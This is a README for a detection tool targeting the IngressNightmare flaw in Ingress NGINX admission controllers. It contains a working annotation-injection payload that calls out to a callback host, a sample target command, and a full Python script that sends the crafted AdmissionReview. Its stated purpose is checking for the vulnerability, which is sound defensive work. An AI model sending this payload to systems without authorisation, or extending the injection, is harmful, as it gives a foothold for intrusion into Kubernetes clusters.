## https://sploitus.com/exploit?id=D80A6F6B-36AD-5AF9-9911-FD8E8DCA059D
# IngressNightmare Detection Tool

## Overview

This tool provides a non-intrusive check for the IngressNightmare vulnerability chain in Ingress NGINX Controller, whose core issue is [CVE-2025-1974](https://nvd.nist.gov/vuln/detail/CVE-2025-1974). It uses the `auth-url` annotation injection vector ([CVE-2025-24514](https://nvd.nist.gov/vuln/detail/CVE-2025-24514)) to confirm that the admission controller evaluates attacker-supplied NGINX directives, without executing arbitrary code on the target.

## Technical Background

The IngressNightmare vulnerability chain allows attackers to inject arbitrary NGINX configuration directives through several Ingress annotation fields. When a malicious Ingress resource reaches the admission controller, the controller renders it into a temporary NGINX configuration and validates that configuration with `nginx -t`; the injected directives are parsed and evaluated during that validation step, before the resource is ever admitted.

This tool uses the `auth-url` vector: it injects an `error_log` directive whose syslog server is a hostname under a DNS callback domain you control. While validating the generated configuration, NGINX will:

1. Parse the injected directives
2. Resolve the syslog server hostname via DNS, because the `server=` parameter of `error_log syslog:` is resolved when the directive is parsed

A DNS query for that hostname arriving at your listener is therefore a signal that the controller evaluated attacker-supplied directives, obtained without code execution or service disruption on the target.

## Usage

1. Establish a DNS callback listener using Burp Collaborator, interactsh, or any DNS monitoring service.

2. Execute the detection tool:
   ```
   $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
   ```

3. If vulnerable, you will observe DNS resolution attempts to your DNS callback domain:

![poc](./poc.png)

## Detection Methodology

The tool crafts an AdmissionReview request whose embedded Ingress resource carries the following annotation payload:

```
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
```

This payload:
- Places `#` before the injected text so that everything after it is a URL fragment rather than part of the host or path, and uses `;` to terminate the NGINX directive the URL is rendered into
- Injects a newline followed by a `resolver` directive
- Adds an `error_log` directive whose syslog server is a unique hostname under the DNS callback domain
- Ends with a newline and `#`, which comments out the remainder of the templated line so the configuration stays syntactically valid

When a vulnerable admission controller validates this configuration, the result is an outbound DNS lookup for the callback hostname, which confirms the presence of the vulnerability.
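As an added example (not the project's `detect.py`), the following Python builds the AdmissionReview described above around a minimal Ingress, embeds the `auth-url` payload, and optionally POSTs it to the webhook. The webhook path `/networking/v1/ingresses`, the placeholder Ingress spec, the argument order and the use of `urllib` are assumptions made for this example.

```python
"""Build and send an AdmissionReview carrying the IngressNightmare auth-url
detection payload. Added example, not the tool's own detect.py. The webhook
path, Ingress spec and CLI argument order are assumptions."""
import json
import ssl
import sys
import urllib.error
import urllib.request
import uuid

WEBHOOK_PATH = "/networking/v1/ingresses"  # assumed ingress-nginx webhook path
ANNOTATION = "nginx.ingress.kubernetes.io/auth-url"


def build_auth_url_payload(callback_domain: str, marker: str = "") -> str:
    """Annotation value that injects resolver/error_log directives.

    The newlines are real characters, so once the value is rendered into the
    NGINX config the injected lines are parsed by `nginx -t`, which resolves
    the syslog server hostname while parsing `error_log syslog:`.
    """
    host = f"{marker}.{callback_domain}" if marker else callback_domain
    return (
        "http://example.com/#;\n"          # '#' starts a fragment, ';' ends the directive
        " resolver 8.8.8.8;\n"
        f" error_log syslog:server={host}:80 debug;\n"
        " #"                                # comment out the rest of the templated line
    )


def build_admission_review(callback_domain: str, marker: str = "") -> dict:
    """Wrap a placeholder Ingress carrying the payload in an AdmissionReview."""
    ingress = {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "Ingress",
        "metadata": {
            "name": "ingressnightmare-check",
            "namespace": "default",
            "annotations": {ANNOTATION: build_auth_url_payload(callback_domain, marker)},
        },
        "spec": {"rules": [{
            "host": "check.invalid",  # constructed placeholder host
            "http": {"paths": [{
                "path": "/", "pathType": "Prefix",
                "backend": {"service": {"name": "placeholder", "port": {"number": 80}}},
            }]},
        }]},
    }
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "request": {
            "uid": str(uuid.uuid4()),
            "kind": {"group": "networking.k8s.io", "version": "v1", "kind": "Ingress"},
            "resource": {"group": "networking.k8s.io", "version": "v1", "resource": "ingresses"},
            "namespace": "default",
            "operation": "CREATE",
            "userInfo": {"username": "system:serviceaccount:default:default"},
            "object": ingress,
            "dryRun": False,
        },
    }


def send_review(target: str, review: dict, path: str = WEBHOOK_PATH,
                verify_tls: bool = False, timeout: float = 15.0) -> dict:
    """POST the review to the admission webhook and return its JSON response.

    Webhooks usually present a self-signed certificate, so verification is off
    by default. The HTTP answer is secondary: the DNS lookup at the callback
    domain is the signal, whether the review comes back allowed or denied.
    """
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(
        target.rstrip("/") + path, data=json.dumps(review).encode(), method="POST",
        headers={"Content-Type": "application/json", "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
            raw = resp.read()
    except urllib.error.HTTPError as err:  # non-2xx replies still carry a body
        raw = err.read()
    return json.loads(raw.decode() or "{}")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} https://webhook-host:443 callback.domain")
    marker = uuid.uuid4().hex[:8]  # unique per run so callbacks can be attributed
    result = send_review(sys.argv[1], build_admission_review(sys.argv[2], marker))
    response = result.get("response", {})
    print("allowed:", response.get("allowed"), response.get("status", {}).get("message", ""))
    print(f"watch the DNS listener for {marker}.{sys.argv[2]}")
```

`json.dumps` encodes the embedded newlines as `\n` escape sequences, which the webhook decodes back into real newlines before rendering; a client that escapes the backslash a second time would deliver a harmless single-line URL, so the round trip is worth checking when adapting this to another HTTP client.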

## Limitations

This tool only detects the presence of the vulnerability; it does not attempt to exploit it for arbitrary code execution.

Other points to keep in mind:

- A missing callback is not proof that the controller is patched. The lookup is made from the controller pod, so cluster egress DNS filtering, a resolver that cannot reach the callback domain, or a webhook endpoint that is not reachable from where you run the tool will all produce a false negative.
- The annotation value must reach the controller with literal newline characters (JSON-encoded as `\n`); a client that double-escapes them sends a harmless single-line URL and nothing is injected.
- Use a unique hostname under the callback domain for each target so that callbacks can be attributed to a specific controller.

## Credits

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities